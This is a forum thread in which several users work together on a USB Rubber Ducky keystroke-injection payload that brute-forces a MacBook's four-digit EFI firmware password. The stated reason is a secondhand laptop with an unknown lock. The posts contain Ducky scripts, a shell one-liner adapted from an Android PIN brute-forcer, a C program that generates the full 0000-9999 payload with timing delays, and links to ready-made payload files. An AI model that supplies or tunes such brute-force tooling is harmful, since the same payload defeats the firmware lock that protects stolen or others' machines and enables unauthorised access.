anto0522 Posted December 23, 2014 Posted December 23, 2014 (edited) Hi everyone, I recently bought a macbook from Ebay and after having received it I formatted the hard drive to do a clean install of the OS. That's were things got a bit tricky... I can't reinstall the OS since I am prompted for the EFI password every time I attempt to boot from a CD or a bootable usb key. Neither I or the previous owner know the password and Apple wants to charge me a fait bit of money to recover it. I've done some research, and it seems possible to brute force the password which is most likely a 4digits pin code. I decided to use the rubber ducky to create a payload similar to the one Darren uses to hack the pin of an android phone but I haven't had much luck so far. The laptop seems to recognise the ducky as an external keyboard but doesn't type the full pin and only a single digit ends up being typed. I reckon it's pretty much the same problem than this user ran into : https://forums.hak5.org/index.php?/topic/32410-macosx-efi-anyone-have-payload-for-efi-password/ I've done a fair bit of research and it seems that people wanting to bruteforce the EFI password mostly use the teensy development board. I'm pretty sure that the ducky is perfectly capable of doing the same thing and I would like to use this thread to come up with a payload that everyone can use to bruteforce mac EFIs. I have noticed that a few people have already posted on this forum about this issue (see link bellow) but no one has posted a working payload yet. https://forums.hak5.org/index.php?/topic/30800-payload-on-macbook-air2010-2013-help-needed/ This is the non working payload I have been using so far, any help would be greatly appreciated DELAY 5000 STRING 0000 ENTER DELAY 10000 STRING 0001 ENTER DELAY 10000 STRING 0002 ENTER DELAY 10000 ... Useful link. http://www.hackmac.org/forum/topic/1524-efi-pin-bruteforcing/ Edited December 23, 2014 by anto0522 Quote
dataghost Posted January 1, 2015 Posted January 1, 2015 I too am looking for help on this, I just ordered a teensy 3.1 because its already supported. I wish i was smarter to be able to get the ducky to do this, I am new to the ducky, i love it i also just need some guidance. Maybe Darren has some insight would be awesome. Quote
nemesis_00 Posted January 1, 2015 Posted January 1, 2015 have you already tried one digit at the time with delay? Quote
bingowings85 Posted January 2, 2015 Posted January 2, 2015 how will the script know when to stop? what about a random markov walk? Quote
dataghost Posted January 2, 2015 Posted January 2, 2015 I'm not sure what can be done on this I too would love help and don't know scripting enough. I'll keep playing around Quote
dataghost Posted January 4, 2015 Posted January 4, 2015 i modified the original android script so that there is only one enter and not two. I think to make this work it needs to have a pause between keystrokes its trying to type to fast I believe. Here is the modified script so that one enter is placed instead of two echo DELAY 5000 > android_brute-force_0000-9999.txt; echo {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$/\nDELAY 1000\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt I dont know what to change from here but what i believe would need to happen is lets say 500ms delay between keystrokes so for pin 0000 would need to be ENTER 0 DELAY 500ms ENTER 0 DELAY 500ms ENTER 0 DELAY 500ms ENTER and so on. Does anyone know how to write this script so we can give this a shot? Thanks Quote
belly Posted February 22, 2015 Posted February 22, 2015 hey, i wrote a small c program to generate a textfile that i translate via online-encoder. #include<stdio.h> int main() { FILE *datei; datei = fopen("test.txt", "w"); if (datei == NULL) { printf("Fehler beim oeffnen der Datei."); return 1; } fprintf(datei, "DELAY 5000\n"); int i; for(i=0; i<10; i++) { fprintf(datei, "STRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING 0\nDELAY 700\nSTRING %i\nDELAY 700\nENTER\nDELAY 12500\n", i); } for(i=10; i<100; i++) { fprintf(datei, "STRING 0\nDELAY 500\nSTRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i); } for(i=100; i<1000; i++) { fprintf(datei, "STRING 0\nDELAY 500\nSTRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i); } for(i=1000; i<10000; i++) { fprintf(datei, "STRING %i\nDELAY 1500\nENTER\nDELAY 7500\n", i); } fclose(datei); return 0; } what i realized too is that you have to put in digit by digit, STRING 0001 ENTER is way too fast! I keep playing around with the different delays, by now my payload is able to run about two hours broodforcing an mbair but then something seems to go wrong cauz it only enters three digits after running two hours... i also realized theres differences between a macbook retina and a macbook air. i attached the .txt and .bin of my payload - if anyone is in intrested or has an idea i would love to figure out whats the problem! and a small video of the stick of the ducky starting to attack^^ https://www.facebook.com/video.php?v=10204806167131861&set=vb.1168804757&type=3&theater so long, belly payload (txt): http://www47.zippyshare.com/v/tXyo9I7o/file.html payload (bin): http://www47.zippyshare.com/v/8OKsSeUy/file.html Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.